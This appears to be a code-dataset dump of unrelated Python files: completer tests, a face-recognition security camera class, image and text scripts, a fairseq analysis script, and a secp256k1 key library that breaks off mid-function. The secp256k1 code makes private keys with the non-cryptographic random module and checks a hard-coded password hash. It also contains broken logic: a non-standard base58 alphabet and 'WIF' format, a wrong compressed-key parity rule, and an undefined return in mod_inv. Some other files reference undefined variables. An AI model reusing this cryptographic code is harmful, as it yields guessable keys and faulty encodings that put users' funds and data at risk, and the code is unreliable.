content
stringlengths 5
1.05M
|
|---|
"""Tests for the base completer's logic (xonsh/completer.py)"""
import pytest
from xonsh.completers.tools import RichCompletion, contextual_command_completer, non_exclusive_completer
from xonsh.completer import Completer
from xonsh.parsers.completion_context import CommandContext
@pytest.fixture(scope="session")
def completer():
return Completer()
@pytest.fixture
def completers_mock(xonsh_builtins, monkeypatch):
completers = {}
monkeypatch.setattr(xonsh_builtins.__xonsh__, "completers", completers)
return completers
def test_sanity(completer, completers_mock):
# no completions:
completers_mock["a"] = lambda *a: None
assert completer.complete("", "", 0, 0) == ((), 0)
# simple completion:
completers_mock["a"] = lambda *a: {"comp"}
assert completer.complete("pre", "", 0, 0) == (("comp",), 3)
# multiple completions:
completers_mock["a"] = lambda *a: {"comp1", "comp2"}
assert completer.complete("pre", "", 0, 0) == (("comp1", "comp2"), 3)
# custom lprefix:
completers_mock["a"] = lambda *a: ({"comp"}, 2)
assert completer.complete("pre", "", 0, 0) == (("comp",), 2)
# RichCompletion:
completers_mock["a"] = lambda *a: {RichCompletion("comp", prefix_len=5)}
assert completer.complete("pre", "", 0, 0) == ((RichCompletion("comp", prefix_len=5),), 3)
def test_cursor_after_closing_quote(completer, completers_mock):
"""See ``Completer.complete`` in ``xonsh/completer.py``"""
@contextual_command_completer
def comp(context: CommandContext):
return {context.prefix + "1", context.prefix + "2"}
completers_mock["a"] = comp
assert completer.complete("", "", 0, 0, {}, multiline_text="'test'", cursor_index=6) == (
("test1'", "test2'"), 5
)
assert completer.complete("", "", 0, 0, {}, multiline_text="'''test'''", cursor_index=10) == (
("test1'''", "test2'''"), 7
)
def test_cursor_after_closing_quote_override(completer, completers_mock):
"""Test overriding the default values"""
@contextual_command_completer
def comp(context: CommandContext):
return {
# replace the closing quote with "a"
RichCompletion("a", prefix_len=len(context.closing_quote), append_closing_quote=False),
# add text after the closing quote
RichCompletion(context.prefix + "_no_quote", append_closing_quote=False),
# sanity
RichCompletion(context.prefix + "1"),
}
completers_mock["a"] = comp
assert completer.complete("", "", 0, 0, {}, multiline_text="'test'", cursor_index=6) == (
(
"a",
"test1'",
"test_no_quote",
), 5
)
assert completer.complete("", "", 0, 0, {}, multiline_text="'''test'''", cursor_index=10) == (
(
"a",
"test1'''",
"test_no_quote",
), 7
)
def test_append_space(completer, completers_mock):
@contextual_command_completer
def comp(context: CommandContext):
return {
RichCompletion(context.prefix + "a", append_space=True),
RichCompletion(context.prefix + " ", append_space=False), # bad usage
RichCompletion(context.prefix + "b", append_space=True, append_closing_quote=False),
}
completers_mock["a"] = comp
assert completer.complete("", "", 0, 0, {}, multiline_text="'test'", cursor_index=6) == (
(
"test '",
"testa' ",
"testb ",
), 5
)
@pytest.mark.parametrize("middle_result, exp", (
(
# stop at the first exclusive result
(
{"b1", "b2"},
("a1", "a2", "b1", "b2")
),
# pass empty exclusive results
(
{},
("a1", "a2", "c1", "c2")
),
# pass empty exclusive results
(
None,
("a1", "a2", "c1", "c2")
),
# stop at StopIteration
(
StopIteration,
("a1", "a2")
),
)
))
def test_non_exclusive(completer, completers_mock, middle_result, exp):
completers_mock["a"] = non_exclusive_completer(lambda *a: {"a1", "a2"})
def middle(*a):
if middle_result is StopIteration:
raise StopIteration()
return middle_result
completers_mock["b"] = middle
completers_mock["c"] = non_exclusive_completer(lambda *a: {"c1", "c2"})
assert completer.complete("", "", 0, 0, {})[0] == exp
|
import face_recognition
import cv2
import numpy as np
import torch
import torchtext
import os
import sys
import string
import random
import imutils
import datetime
from google.cloud import vision
class Sercurity:
def __init__(self, datasets_path, accumWeight=0.5):
self.glove = torchtext.vocab.GloVe(name="6B", dim=50)
self.datasets_path = datasets_path
self.known_face_encodings = []
self.known_face_names = []
# store the accumulated weight factor
self.accumWeight = accumWeight
# initialize the background model
self.bg = None
self.dangers = ['gun', 'knife', 'coke']
def print_closest_words(self, vec, n):
dists = torch.norm(self.glove.vectors - vec, dim=1)
lst = sorted(enumerate(dists.numpy()), key=lambda x: x[1])
result = []
for idx, difference in lst[1:n+1]:
result.append(self.glove.itos[idx])
return result
def load_config(self, dist):
for key, item in dist.items():
print(key, item)
if item == 'on':
if 'SMS' in key:
# set up SMS
pass
else:
self.dangers.append(key)
else:
if 'SMS' in key:
# disable SMS
pass
else:
self.dangers.remove(key)
def update(self, image):
# if the background model is None, initialize it
if self.bg is None:
self.bg = image.copy().astype("float")
return
# update the background model by accumulating the weighted
# average
cv2.accumulateWeighted(image, self.bg, self.accumWeight)
def load_known_face(self):
for filename in os.listdir(self.datasets_path):
if 'jpg' in filename or 'png' in filename:
face_path = os.path.join(self.datasets_path, filename)
# Load facechicken from datasets
face = face_recognition.load_image_file(face_path)
face_encoding = face_recognition.face_encodings(face)[0]
self.known_face_encodings.append(face_encoding)
face_name = filename.replace('_', '.').split('.')[0]
self.known_face_names.append(face_name)
print(face_name)
# inputs:
# locations will be a list of tuple which contains the location of each face[(),()]
# img will be a 3 dimentional img matrix
# return:
# list of face face_encodings
def extract_face(self,locations, img):
return locations.face_encoding(img, locations)
def randomString(self, stringLength=10):
letters = string.ascii_lowercase
return ''.join(random.choice(letters) for i in range(stringLength))
def face_detection(self, image):
client = vision.ImageAnnotatorClient()
imageByte = vision.types.Image(content=cv2.imencode('.jpg', image)[1].tostring())
response = client.label_detection(image=imageByte)
labels = response.label_annotations
print('Labels:')
for label in labels:
print(label.description)
return faceBounds
def set_danger_label(self, list_label):
self.dange_labels = list_label
def detect_labels(self, image):
"""Detects labels in the file."""
client = vision.ImageAnnotatorClient()
imageByte = vision.types.Image(content=cv2.imencode('.jpg', image)[1].tostring())
tlabels = []
v_scores = []
objects = client.object_localization(image=imageByte).localized_object_annotations
print('Number of objects found: {}'.format(len(objects)))
for object_ in objects:
tlabels.append(object_.name)
v_scores.append(object_.score)
print('\n{} (confidence: {})'.format(object_.name, object_.score))
return tlabels, v_scores
def analyzer(self, labels, v_scores):
if np.shape(v_scores)[0] != 0:
n_scores = np.zeros(np.shape(v_scores))
n_label = np.empty(np.shape(v_scores), dtype="S15")
for i, label in enumerate(labels):
##### word calculus #####
label = label.split(' ')
label_t = self.glove[label[0].lower()]
for token in label[1:]:
label_t = label_t + self.glove[token]
##### word calculus #####
# print(label)
for danger in self.dangers:
danger_t = self.glove[danger.lower()].unsqueeze(0)
max_sim = 0
# danger_sets = self.print_closest_words(danger_t, 2)
# max_sim = torch.cosine_similarity(label_t.unsqueeze(0), danger_t)
# n_label[i] = danger
# n_scores[i] = max_sim
# for danger_sub in danger_sets:
# danger_sub_t = self.glove[danger_sub.lower()].unsqueeze(0)
similarity = torch.cosine_similarity(label_t.unsqueeze(0), danger_t)
# print(similarity)
if similarity > max_sim:
max_sim = similarity
n_label[i] = danger
n_scores[i] = similarity.item()
labels = np.array(labels)
n_scores = np.array(n_scores)
v_scores = np.array(v_scores)
norm = np.add(n_scores, v_scores) / 2
# print(norm[norm>0.55])
n_label = np.array(n_label)
dangers_need_report = n_label[norm>0.78]
norm = norm[norm>0.78]
return dangers_need_report, norm
return None, None
def add_new_face_to_datasets(self, face_img, face_encoding):
confirm = input('Unkonw face detected. Do you want add it to dataset?(Y/N)')
if confirm == 'Y' or confirm == 'y':
new_face_name = input('Name:')
new_face_path = os.path.join(self.datasets_path, new_face_name+'_'+randomString(10)+'.jpg')
cv2.imwrite(new_face_path, face_img)
self.known_face_encodings.append(face_encoding)
self.known_face_names.append(new_face_name)
print('New image saved!')
def crop_face(self, frame, face_location):
top = face_location[0]*4
right = face_location[1]*4
bottom = face_location[2]*4
left = face_location[3]*4
face = frame[top:bottom, left:right]
return face
def shrink_frame(self, frame):
small_frame = cv2.resize(frame, (0, 0), fx=0.25, fy=0.25)
return small_frame[:, :, ::-1]
def recongnize(self, frame):
rgb_small_frame = self.shrink_frame(frame)
face_locations = face_recognition.face_locations(rgb_small_frame)
face_encodings = face_recognition.face_encodings(rgb_small_frame, face_locations)
name_result = []
for i, face_encoding in enumerate(face_encodings):
matches = face_recognition.compare_faces(self.known_face_encodings, face_encoding)
name = 'Unknown'
face_distances = face_recognition.face_distance(self.known_face_encodings, face_encoding)
best_match_index = np.argmin(face_distances)
if matches[best_match_index]:
name = self.known_face_names[best_match_index]
name_result.append(name)
return face_locations, name_result
def display_result(self, frame, locations, names):
# Display the results
for (top, right, bottom, left), name in zip(locations, names):
# Scale back up face locations since the frame we detected in was scaled to 1/4 size
top *= 4
right *= 4
bottom *= 4
left *= 4
# Draw a box around the face
cv2.rectangle(frame, (left, top), (right, bottom), (0, 0, 255), 2)
# Draw a label with a name below the face
cv2.rectangle(frame, (left, bottom - 35), (right, bottom), (0, 0, 255), cv2.FILLED)
font = cv2.FONT_HERSHEY_DUPLEX
cv2.putText(frame, name, (left + 6, bottom - 6), font, 1.0, (255, 255, 255), 1)
return frame
def motion_detect(self, image, tVal=45):
# compute the absolute difference between the background model
# and the image passed in, then threshold the delta image
delta = cv2.absdiff(self.bg.astype("uint8"), image)
thresh = cv2.threshold(delta, tVal, 255, cv2.THRESH_BINARY)[1]
# perform a series of erosions and dilations to remove small
# blobs
thresh = cv2.erode(thresh, None, iterations=2)
thresh = cv2.dilate(thresh, None, iterations=2)
# find contours in the thresholded image and initialize the
# minimum and maximum bounding box regions for motion
cnts = cv2.findContours(thresh.copy(), cv2.RETR_EXTERNAL,
cv2.CHAIN_APPROX_SIMPLE)
cnts = imutils.grab_contours(cnts)
(minX, minY) = (np.inf, np.inf)
(maxX, maxY) = (-np.inf, -np.inf)
# if no contours were found, return None
if len(cnts) == 0:
return None
# otherwise, loop over the contours
for c in cnts:
# compute the bounding box of the contour and use it to
# update the minimum and maximum bounding box regions
(x, y, w, h) = cv2.boundingRect(c)
(minX, minY) = (min(minX, x), min(minY, y))
(maxX, maxY) = (max(maxX, x + w), max(maxY, y + h))
# otherwise, return a tuple of the thresholded image along
# with bounding box
return (thresh, (minX, minY, maxX, maxY))
def detect_and_show(self, frame, total, frameCount):
gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
if np.shape(gray) == np.shape(self.bg):
gray = cv2.GaussianBlur(gray, (7, 7), 0)
mo = False
# grab the current timestamp and draw it on the frame
timestamp = datetime.datetime.now()
cv2.putText(frame, timestamp.strftime(
"%A %d %B %Y %I:%M:%S%p"), (10, frame.shape[0] - 10),
cv2.FONT_HERSHEY_SIMPLEX, 0.35, (0, 0, 255), 1)
# if the total number of frames has reached a sufficient
# number to construct a reasonable background model, then
# continue to process the frame
if total > frameCount:
# detect motion in the image
motion = self.motion_detect(gray)
# cehck to see if motion was found in the frame
if motion is not None:
# unpack the tuple and draw the box surrounding the
# "motion area" on the output frame
(thresh, (minX, minY, maxX, maxY)) = motion
cv2.rectangle(frame, (minX, minY), (maxX, maxY),
(0, 0, 255), 2)
mo = True
# update the background model and increment the total number
# of frames read thus far
self.update(gray)
return mo, frame
else:
self.bg = None
self.update(gray)
return False, frame
|
#!/usr/bin/env python3
__author__ = 'Thibaut Kovaltchouk'
# -*- coding: utf-8 -*-
filename = "lenna.jpg"
import numpy as np
import cv2
def replace_impose(imageBGR, value, impose="H"):
imgIn = cv2.cvtColor(imageBGR, cv2.COLOR_BGR2HSV)
# we fixe the value depending of the parameter impose
if impose.lower() == "h":
imgIn[:,:,0] = value*np.ones(imgIn.shape[:2], dtype=np.uint8)
elif impose.lower() == "s":
imgIn[:,:,1] = value*np.ones(imgIn.shape[:2], dtype=np.uint8)
elif impose.lower() == "v":
imgIn[:,:,2] = value*np.ones(imgIn.shape[:2], dtype=np.uint8)
else:
print("impose = ", impose)
print("Should be H, S or V")
imgOut = cv2.cvtColor(imgIn, cv2.COLOR_HSV2BGR)
return imgOut
imgIn = cv2.imread(filename)
listH = np.linspace(0, 360, 16)
for h in listH:
img = np.copy(imgIn)
New_img = replace_impose(img, int(h/2), impose="H")
base = filename.split(".")[-2]
outputImage = base + "_H" + str(int(h)) + ".png"
cv2.imwrite(outputImage, New_img)
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import re
import string
input_text = open('idz2.txt', 'r').read().lower().split(' ')
alphabet = list(string.ascii_lowercase)
unique_words = []
for word in input_text:
if word not in unique_words:
unique_words.append(word)
unique_words = re.sub(r'[^\w\s]', '', str(unique_words)).split()
min_value = len(unique_words)
min_char = 0
for char in alphabet:
counter = 0
for word in unique_words:
if char in word:
counter += 1
if counter < min_value:
min_value = counter
min_char = char
print(f'Буква {char.upper()} встречается в {round(counter / len(unique_words) * 100, 2)}% слов.')
print(f'\tБуква {min_char.upper()} встречалась в {round(min_value / len(unique_words) * 100, 2)}% слов.'
f'ЭТО САМАЯ РЕДКАЯ БУКВА В ТЕКСТЕ')
|
import argparse
import html
import json
import os
from collections import Counter
from tqdm import tqdm
import numpy as np
import pandas as pd
import torch
from fairseq.modules.adaptive_input import AdaptiveInput
from fairseq.modules.adaptive_softmax import AdaptiveSoftmax
num_layers = 16
def get_model(model_dir):
model_path = os.path.join(model_dir, "model.pt")
model = torch.load(model_path)['model']
embedding_parameters = {k[len('decoder.embed_tokens.'):]: v for k, v in model.items() if 'embed_tokens' in k}
embedding = AdaptiveInput(267744, 0, 1024, 4, 1024, [20000, 60000])
embedding.load_state_dict(embedding_parameters)
softmax = AdaptiveSoftmax(267744, 1024, [20000, 60000], 0.2, adaptive_inputs=embedding)
return model, softmax
def load_vocab(model_dir):
vocab = [['<s>', -1], ['<pad>', -1], ['</s>', -1], ['<unk>', -1]]
vocab_path = os.path.join(model_dir, "dict.txt")
with open(vocab_path, "r") as fd:
vocab.extend([line.strip('\n').split(' ') for line in fd.readlines()])
token_to_id = {token_cnt[0]: i for i, token_cnt in enumerate(vocab)}
return vocab, token_to_id
def get_target_counts(catalog_dir):
target_counts = {}
for filename in tqdm(os.listdir(catalog_dir)):
dim, layer = filename.strip('.text').split('_')
with open(os.path.join(catalog_dir, filename), "r") as fd:
top_records = [line.split('\t')[1] for line in fd.readlines()]
# fix bug: taking the one-before-last token, because we are ignoring the BOS token.
dim_targets = []
for record in top_records:
record_tokens = record.split(' ')
if len(record_tokens) > 1:
target_token = html.unescape(record_tokens[-2])
if target_token in ['unk', 'pad']:
target_token = '<' + target_token + '>'
dim_targets.append(target_token)
else:
dim_targets.append("<s>")
dim_target_counts = Counter(dim_targets)
target_counts[f"{layer}_{dim}"] = {target: cnt for target, cnt in dim_target_counts.most_common()}
return target_counts
def get_softmax_log_probabilities(model, softmax, weight_coefficient):
log_probs = []
for layer_i in tqdm(range(num_layers)):
layer_fc2_vals = model[f"decoder.layers.{layer_i}.fc2.weight"] * weight_coefficient
layer_log_probs = softmax.get_log_prob(layer_fc2_vals.T.unsqueeze(0), None).squeeze()
log_probs.append(layer_log_probs)
return log_probs
def compare_argmax_w1_w2_all_layers(log_probs, vocab, token_to_id, catalog):
num_dims = len(log_probs[0])
num_vocab_ids = len(log_probs[0][0])
max_probs = []
argmax_probs = []
emb_tokens = []
target_counts = []
target_rankings = []
for layer_i, layer_log_probs in tqdm(enumerate(log_probs)):
layer_log_probs_max = layer_log_probs.max(axis=1)
layer_probs_max_embs = layer_log_probs_max[1].numpy().tolist()
max_probs.append(layer_log_probs_max[0].exp().detach().numpy().tolist())
argmax_probs.append(layer_probs_max_embs)
layer_emb_tokens = [
vocab[layer_probs_max_emb][0]
for layer_probs_max_emb in layer_probs_max_embs
]
emb_tokens.append(layer_emb_tokens)
layer_target_counts = []
for dim_i, layer_emb_token in enumerate(layer_emb_tokens):
layer_dim = f"{layer_i}_{dim_i}"
if layer_dim not in catalog:
layer_target_counts.append(-1)
elif layer_emb_token in catalog[layer_dim]:
layer_target_counts.append(catalog[layer_dim][layer_emb_token])
else:
layer_target_counts.append(0)
target_counts.append(layer_target_counts)
layer_log_probs_argsort = torch.argsort(layer_log_probs, axis=1, descending=True).numpy()
layer_target_rankings = []
for dim_i in range(num_dims):
layer_dim = f"{layer_i}_{dim_i}"
dim_layer_target_rankings = []
for target_token in catalog[layer_dim]:
if target_token in token_to_id:
target_id = token_to_id[target_token]
else:
target_id = token_to_id["<unk>"]
if target_id >= num_vocab_ids:
print(f"{layer_dim}: token {target_token} out-of-vocab with id {target_id}")
continue
target_id_rank = np.where(layer_log_probs_argsort[dim_i] == target_id)[0][0]
dim_layer_target_rankings.extend([target_id_rank] * catalog[layer_dim][target_token])
layer_target_rankings.append(dim_layer_target_rankings)
target_rankings.append(layer_target_rankings)
all_dims_data = [
{
"layer": layer_i,
"W2_dim": dim_i,
"max_prob": max_probs[layer_i][dim_i],
"embedding_index": argmax_probs[layer_i][dim_i],
"embedding_token": emb_tokens[layer_i][dim_i],
"embedding_token_target_count": target_counts[layer_i][dim_i],
"target_rankings": target_rankings[layer_i][dim_i]
}
for layer_i in range(len(max_probs))
for dim_i in range(len(max_probs[layer_i]))
]
df = pd.DataFrame.from_records(all_dims_data)
return df, max_probs
def main(args):
model, softmax = get_model(args.model_dir)
vocab, token_to_id = load_vocab(args.model_dir)
catalog = get_target_counts(args.data_dir)
print("get max probability per W2 column...")
log_probs = get_softmax_log_probabilities(model, softmax, weight_coefficient=1)
print("map to tokens and get target rankings in W2 induced probs...")
df_w1_w2_argmax, max_probs = compare_argmax_w1_w2_all_layers(log_probs, vocab, token_to_id, catalog)
print("saving results...")
df_w1_w2_argmax.to_csv(f"{args.output_base}.tsv", sep="\t", index=False)
json.dump(max_probs,
open(f"{args.output_base}_max_probs.json", "w"),
indent=4)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--data_dir', type=str,
help='path to a per-key trigger examples directory')
parser.add_argument('--model_dir', type=str, default='checkpoints/adaptive_lm_wiki103.v2',
help='path to model checkpoints directory')
parser.add_argument('--output_base', type=str, default='',
help='path to output path (without a file extension)')
args = parser.parse_args()
assert os.path.exists(args.data_dir)
assert os.path.exists(args.model_dir)
main(args)
|
import os
import os.path
from typing import List
from pathlib import Path
def get_cirrus_lib_requirements() -> List[str]:
'''
Get the cirrus-lib dependencies.
'''
try:
from importlib import metadata
except ImportError:
import importlib_metadata as metadata
return [
req.split(';')[0].translate(str.maketrans('','',' ()'))
for req in metadata.requires('cirrus-lib')
]
def relative_to(path1: Path, path2: Path) -> Path:
common_path = path1
relative = ''
path = path2.resolve()
result = path
while True:
try:
result = path.relative_to(common_path)
except ValueError:
_common_path = common_path.parent
relative += '../'
else:
if not relative:
relative = './'
return Path(relative + str(result))
if _common_path == common_path:
break
common_path = _common_path
return result
def relative_to_cwd(path: Path) -> Path:
return '.{}{}'.format(
os.path.sep,
relative_to(Path(os.getcwd()), path),
)
def clean_dir(directory: Path) -> None:
import shutil
if not directory.is_dir():
return
for f in directory.iterdir():
if not f.is_symlink() and f.is_dir():
shutil.rmtree(f)
else:
f.unlink()
|
x = int(input("Escolha\n1.Cagar\n2.Mijar\n3.Peidar\n"))
if x == 1:
print("cagão")
else:
print("mijão")
x = 10
y = 15
z = 25
print(x == z - y and z != y - x or not y != z - x)
|
from types import SimpleNamespace
from . import errors
import logging
log = logging.getLogger(__name__)
class Locker:
'''Simple locker that can be unlocked with multiple picks'''
def __init__(self):
self.unlocked = False
class LockpickStorage(SimpleNamespace):
pass
self.lockpicks = LockpickStorage()
log.debug("Initialized Locker instance")
def get_status(self):
'''Return locker's status'''
log.debug(f"Returning current locker's status: {self.unlocked}")
return self.unlocked
def get_lockpicks(self):
'''Return lockpicks'''
log.debug(f"Returning current lockpicks: {self.lockpicks}")
return vars(self.lockpicks)
def check_lockpick(self, name:str):
'''Checks if lockpick exists in storage. Returns bool depending on status'''
if getattr(self.lockpicks, name, None) == None:
log.debug(f"{name} doesnt exist in storage")
return False
log.debug(f"{name} exists in storage")
return True
def get_lockpick(self, name:str):
'''Get specified lockpick. If not in storage - will throw exception'''
if not self.check_lockpick(name):
raise errors.LockpickDoesntExist(name)
log.debug(f"Returning lockpick {name}")
return getattr(self.lockpicks, name)
def add_lockpick(self, name:str, status:bool = False):
'''Add lockpick to the lockpicks storage'''
if self.check_lockpick(name):
raise errors.LockpickExists(name)
setattr(self.lockpicks, name, status)
log.debug(f"Succesfully added {name} to the lockpicks storage")
def toggle_lockpick(self, name:str, status:bool = None):
'''Toggle existing lockpick. Expect lockpick to already exist in storage.
Without specified status, will flip current lockpick values'''
if not self.check_lockpick(name):
raise errors.LockpickDoesntExist(name)
if status == None:
if getattr(self.lockpicks, name):
status = False
else:
status = True
setattr(self.lockpicks, name, status)
log.debug(f"Successfully toggled status of {name} lockpick to {status}")
def picklock(self):
'''Check current storage against keys. If all True - set self.unlocked to
True, else - to False'''
storage_items = vars(self.lockpicks)
for item in storage_items:
if not storage_items[item]:
self.unlocked = False
log.debug(f"Storage is locked: {item} is incorrect lockpick")
return self.unlocked
self.unlocked = True
log.debug("Storage has been unlocked: all lockpicks has matched")
return self.unlocked
|
# This programme contains functions and classes for secp256k1 elliptic curve cryptography
import numpy as np
import hashlib
import random
from getpass import getpass
#Hard coded varaibles
# secp256k1 parameters
secp_G = [int("79BE667EF9DCBBAC55A06295CE870B07029BFCDB2DCE28D959F2815B16F81798", 16),\
int("483ADA7726A3C4655DA4FBFC0E1108A8FD17B448A68554199C47D08FFB10D4B8", 16)]
secp_n = int("FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEBAAEDCE6AF48A03BBFD25E8CD0364141", 16)
secp_p = int("FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEFFFFFC2F", 16)
secp_a = int(0)
secp_b = int(7)
secp_inf_point = [0, 0]
#Symmetric Key
sym_key_n = int(2**512)
#Base58 and Base64 encoding
alphabet_58 = '123456789abcdefghijkmnopqrstuvwxyzABCDEFGHJKLMNPQRSTUVWXYZ'
base58_count = len(alphabet_58)
alphabet_64 = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
base64_count = len(alphabet_64)
def passwd():
i = 0
while i < 4:
pass_attempt = getpass()
if password_check(pass_attempt) != True:
if i > 2:
print("\nPassword authentication failed. Aborting....")
quit()
print("\nPassword attempt failed. You have "+str(3-i)+" remaining attempts.")
i += 1
else:
break
def password_check(password_attempt):
if type(password_attempt) != str:
raise Exception("password input must be a string!")
# Uses a hard-coded password hash (insecure)
password_hash = '8d969eef6ecad3c29a3a629280e686cf0c3f5d5a86aff3ca12020c923adc6c92'
if hashlib.sha256(password_attempt.encode()).hexdigest() == password_hash:
return True
else:
return False
def bin_array(integer):
# Returns a binarry array representation of a positive intger
if type(integer)!= int or integer < 0:
raise Exception("input must be a positive integer!")
return [int(x) for x in bin(integer)[2:]]
class base_58(object):
def encode(self, num):
""" Returns num in a base64-encoded string"""
encode = ''
if (num < 0):
return ''
while (num >= base58_count):
mod = num % base58_count
encode = alphabet_58[mod] + encode
num = num // base58_count
if (num):
encode = alphabet_58[num] + encode
return encode
def decode(self, s):
"""Decodes the base58-encoded string s into an integer"""
decoded = 0
multi = 1
s = s[::-1]
for char in s:
decoded += multi * alphabet_58.index(char)
multi = multi * base58_count
return decoded
class base_64(object):
def encode(self, num):
""" Returns num in a base58-encoded string"""
encode = ''
if (num < 0):
return ''
while (num >= base64_count):
mod = num % base64_count
encode = alphabet_64[mod] + encode
num = num // base64_count
if (num):
encode = alphabet_64[num] + encode
padding = "="
return encode + padding
def decode(self, s):
if s[len(s)-1]!= '=':
raise Exception("Base64 encoded object not formatted correctly. String should end with '='.")
s = s[:len(s)-1]
decoded = 0
multi = 1
s = s[::-1]
for char in s:
decoded += multi * alphabet_64.index(char)
multi = multi * base64_count
return decoded
#Integer math
class intmath(object):
def mod_inv(self, num, modulus):
# finds inverse of a modulo p, assummes a and p are coprime
if type(num) != int:
raise Exception("Inputs must be integer values")
if num <= 0 or num > secp_p:
num = num % modulus
if num == 1:
return a
# Find gcd using Extended Euclid's Algorithm
gcd, x, y = intmath().extended_euclid_gcd(num, modulus)
# In case x is negative, we handle it by adding extra M
# Because we know that multiplicative inverse of A in range M lies
# in the range [0, M-1]
if x < 0:
x += modulus
return x
def extended_euclid_gcd(self, a, b):
"""
Returns a list `result` of size 3 where:
Referring to the equation ax + by = gcd(a, b)
result[0] is gcd(a, b)
result[1] is x
result[2] is y
"""
s = 0; old_s = 1
t = 1; old_t = 0
r = b; old_r = a
while r != 0:
quotient = old_r//r
# In Python, // operator performs integer or floored division
# This is a pythonic way to swap numbers
# See the same part in C++ implementation below to know more
old_r, r = r, old_r - quotient*r
old_s, s = s, old_s - quotient*s
old_t, t = t, old_t - quotient*t
return [old_r, old_s, old_t]
def sqrtmod(self, a, p):
""" Find a quadratic residue (mod p) of 'a'. p
must be an odd prime and p must be equivalent to 3 mod 4.
Solve the congruence of the form:
x^2 = a (mod p)
And returns x. Note that p - x is also a root.
0 is returned if no square root exists for
these a and p.
The Tonelli-Shanks algorithm is used (except
for some simple cases in which the solution
is known from an identity). This algorithm
runs in polynomial time (unless the
generalized Riemann hypothesis is false).
"""
# Simple cases
#
if p % 4 == 3:
power = (p+1) // 4
return pow(a, power , p)
elif a == 0:
return 0
elif p == 2:
return 0
elif intmath().legendre_symbol(a, p) != 1:
return 0
else:
raise Exception("exponent must be 0, 1, 2 or prime and equivalent to 3 mod 4")
def legendre_symbol(self, a, p):
""" Compute the Legendre symbol a|p using
Euler's criterion. p is a prime, a is
relatively prime to p (if p divides
a, then a|p = 0)
Returns 1 if a has a square root modulo
p, -1 otherwise.
"""
ls = pow(a, int((p - 1) / 2), p)
return -1 if ls == p - 1 else ls
# secp256k1
class libsecp(object):
def private_key(self):
return random.randint(1,secp_n)
def public_key(self, priv_key):
if priv_key > secp_n or priv_key < 0 or type(priv_key) != int:
raise Exception("Private key must be an integer between 1 and n.")
return point_mul(priv_key, secp_G)
def public_key_hex(self, pubkey):
if type(pubkey[0]) != int or type(pubkey[1]) != int:
raise Exception("input must be valid (x,y) coordinate.")
if pubkey[0] > secp_p or pubkey[0] < 0 or pubkey[1] > secp_p or pubkey[1] < 0:
raise Exception("input must be valid secp256k1 element.")
pubkey_x = hex(pubkey[0])
pubkey_y = hex(pubkey[1])
result = '0x04' + str(pubkey_x[2:]).zfill(64) + str(pubkey_y[2:]).zfill(64)
return result
def compress_key(self, pub_key):
"""Takes a hexadecimal encoded or integer array public key
Returns a compressed public key '0x02....' or '0x03...' """
if type(pub_key) == str:
if len(pub_key) != 132:
raise Exception("Incorrect public key formatting.")
pub_key_x = int(pub_key[4:68], 16)
pub_key_y = int(pub_key[68:132], 16)
elif len(pub_key) == 2:
pub_key_x = pub_key[0]
pub_key_y = pub_key[1]
else:
raise Exception("incorrect public key formatting.")
if pub_key_x > secp_p or pub_key_x < 0 or pub_key_y > secp_p or pub_key_y < 0:
raise Exception("public key values outside the accepted range!")
if pub_key_y < secp_p // 2:
"""If the y-coordinate is less than (secp256k1) p then y is a "negative" EC point"""
pref = '02'
else:
pref = '03'
result = '0x' + pref + str(hex(pub_key_x)[2:])
return result
def decompress_key(self, comp_pub_key):
raise Exception("Not currently supported.")
"""Calculate the modular square root of x^3 + 7"""
if len(comp_pub_key) != 68:
raise Exception("public key must be a 32 byte string")
if comp_pub_key[0:4]!='0x02' and comp_pub_key[0:4]!='0x03':
raise Exception("Compressed key not formatted correctly!")
# Convert back to integer
pub_key_x = int(comp_pub_key[4:], 16)
rhs = (pow(pub_key_x,3) + secp_a*pub_key_x + secp_b) % secp_p
y_sol1 = intmath().sqrtmod(rhs, secp_p)
y_sol2 = (secp_p - y_sol1)
if pow(y_sol1, 2, secp_p) == rhs and pow(y_sol2, 2, secp_p) == rhs:
if comp_pub_key[0:4] == '0x02':
hex_y_neg = hex(min(y_sol1, y_sol2))
return '0x04' + str(comp_pub_key[4:]) + hex_y_neg[2:]
if comp_pub_key[0:4] == '0x03':
hex_y_pos = hex(max(y_sol1, y_sol2))
return '0x04' + str(comp_pub_key[4:]) + hex_y_pos[2:]
else:
raise Exception("Decompression Failed.")
def wif(self, priv_key):
prefix = "L"
base58_enc = base_58().encode(priv_key)
result = prefix + base58_enc
return result
def decode_wif(self, priv_key_string):
if type(priv_key_string) != str or priv_key_string[0] != 'L' or len(priv_key_string) > 50:
raise Exception("WIF private key not formatted correctly.")
priv_key = base_58().decode(priv_key_string[1:])
return priv_key
def point_double(self, A):
return point_add(A,A)
def point_add(self, A, B):
# input 2 elliptic curve points
if A==secp_inf_point:
return B
if B == secp_inf_point:
return A
if len(A)!=2 or len(B)!=2:
raise Exception("public key must be an array of length 2!")
if type(A[0]) != int or type(B[0]) != int:
raise Exception("EC curve point must be an array of integers!")
if A[0] >= secp_n or A[0] < 0 or A[1] < 0 or A[1] >= secp_n:
raise Exception("input parameter 1 outside the accepted range!")
if B[0] >= secp_n or B[0] < 0 or B[1] < 0 or B[1] >= secp_n:
raise Exception("input parameter 2 outside the accepted range!")
# if A is not equal to B then use this formula
if A!=B:
C_x = (pow(B[1]-A[1],2,secp_p)*pow(intmath().mod_inv(B[0]-A[0],secp_p),2,secp_p) - A[0] - B[0]) % secp_p
C_y = ((B[1]-A[1])*intmath().mod_inv(B[0]-A[0],secp_p)*(A[0]-C_x) - A[1]) % secp_p
return [C_x, C_y]
# if A is equal to B then use this formula
if A==B:
C_x = (pow(3*pow(A[0],2,secp_p) + secp_a,2,secp_p)*pow(intmath().mod_inv(2*A[1],secp_p),2,secp_p) - 2*A[0]) % secp_p
C_y = ((3*pow(A[0],2,secp_p) + secp_a)*intmath().mod_inv(2*A[1],secp_p) + A[0] - C_x - A[1] )% secp_p
return [C_x, C_y]
def point_mul(self, m, B):
if m == 0:
return secp_inf_point
if m == 1:
return B
if len(B)!=2:
raise Exception("public key must be an array of length 2!")
if type(m) != int or type(B[0]) != int:
raise Exception("EC curve point must be an array of integers!")
